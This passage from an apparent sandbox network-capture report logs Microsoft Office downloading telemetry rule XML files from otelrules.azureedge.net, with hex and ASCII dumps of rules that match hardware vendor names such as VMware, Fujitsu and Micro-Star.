                                                                                                                                                                          2024-11-23 18:01:36 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          27192.168.2.54973413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:35 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:35 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                          ETag: "0x8DC582BA41997E3"
                                                                                                                                                                          x-ms-request-id: 21648528-e01e-003c-794e-3cc70b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180135Z-178bfbc474b9fdhphC1NYCac0n00000004qg00000000d3vv
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:36 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          28192.168.2.54973613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:35 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:35 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 464
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                          ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                          x-ms-request-id: 190bcf01-801e-0078-3650-3cbac6000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180135Z-15b8b599d88s6mj9hC1TEBur30000000031g00000000e5tv
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:36 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          29192.168.2.54973713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:35 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:36 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 494
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                          ETag: "0x8DC582BB7010D66"
                                                                                                                                                                          x-ms-request-id: df770720-601e-0002-4a47-3ca786000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180136Z-178bfbc474bbbqrhhC1NYCvw74000000050g00000000586s
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:36 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          30192.168.2.54974113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:37 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:38 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 404
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                          ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                          x-ms-request-id: 90548f26-b01e-0021-643a-3ccab7000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180138Z-178bfbc474b7cbwqhC1NYC8z4n00000004t0000000004qum
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:38 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          31192.168.2.54974013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:37 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:38 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                          ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                          x-ms-request-id: 95105883-701e-001e-6118-3df5e6000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180138Z-178bfbc474bpnd5vhC1NYC4vr400000004u0000000008yqw
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:38 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          32192.168.2.54973913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:37 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:38 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                          ETag: "0x8DC582B9748630E"
                                                                                                                                                                          x-ms-request-id: feb62e3a-f01e-0085-1d2f-3c88ea000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180138Z-178bfbc474bwlrhlhC1NYCy3kg00000004x00000000020ea
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          33192.168.2.54974213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:38 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:38 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                          ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                          x-ms-request-id: babf4520-701e-005c-6e46-3cbb94000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180138Z-178bfbc474bvjk8shC1NYC83ns00000004m000000000f0cs
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:38 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          34192.168.2.54974313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:38 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:38 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:38 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 428
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                          ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                          x-ms-request-id: ffa63380-201e-006e-3b6c-3dbbe3000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180138Z-15b8b599d882zv28hC1TEBdchn0000000390000000001u9s
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:38 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          35192.168.2.54974613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:40 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:40 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 471
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                          ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                          x-ms-request-id: 12cef178-a01e-0070-7e6c-3d573b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180140Z-174c587ffdfp4vpjhC1TEBybqw000000037g00000000fr20
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:40 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          36192.168.2.54974513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:40 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:40 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                          ETag: "0x8DC582B988EBD12"
                                                                                                                                                                          x-ms-request-id: 87817176-601e-003e-034d-3c3248000000
                                                                                                                                                                          x-ms-version: 2018-03-28
